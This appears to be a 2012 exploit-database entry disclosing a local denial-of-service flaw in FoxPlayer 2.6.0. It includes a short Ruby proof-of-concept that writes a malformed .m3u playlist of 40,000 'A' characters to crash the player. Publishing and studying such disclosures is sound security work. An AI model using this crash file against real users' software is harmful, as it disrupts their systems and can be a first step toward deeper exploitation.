FoxPlayer 2.6.0 Denial Of Service

2012.04.03
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

Denial of Service in FoxPlayer version 2.6.0 =================================================================================== # Exploit Title:Denial of Service in FoxPlayer version 2.6.0 # Download link :http://www.foxmediatools.com/installers/fox-player-setup.exe # Author: Ahmed Elhady Mohamed # Email : ahmed.elhady.mohamed@gmail.com # version: version 2.6.0 # Category: DOS # Tested on: windows XP SP3 =================================================================================== ########################################DESC####################################### #Foxplayer 2.6.0 suffers form a denial of service vulnerability ,when opening a # #malicious .m3u file. # ################################################################################### #!/usr/bin/ruby File.open "Crash.m3u" , "w" do |file| junk = "A" * 40000 file.puts junk end

References:

http://www.foxmediatools.com/installers/fox-player-setup.exe


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top